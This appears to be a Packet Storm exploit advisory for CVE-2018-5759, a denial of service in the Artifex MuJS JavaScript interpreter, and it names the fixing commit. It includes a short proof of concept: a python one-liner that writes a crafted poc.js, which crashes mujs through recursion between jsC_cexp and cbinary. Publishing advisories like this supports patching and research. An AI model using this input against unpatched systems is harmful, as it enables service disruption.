Artifex MuJS suffers from a denial of service vulnerability.
b5e85f6016216c998e0156693260ccc448ac852c9179b3a381daee1dac8312b9The continuous call between the two functions "jsC_cexp" function and "cbinary"
allows attackers to cause a denial of service (application crash) via a
crafted js file
# Exploit Title: DoS caused by the interactive call between two functions
# Date: 2018-01-16
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-5759
Simple poc:
# python -c "print 'func%d'*80000" > poc.js
# mujs poc.js
Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
http://git.ghostscript.com/?p=mujs.git;a=commit;h=
4d45a96e57fbabf00a7378b337d0ddcace6f38c1)
Please let me know if you need more info.
Andrea Sindoni
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed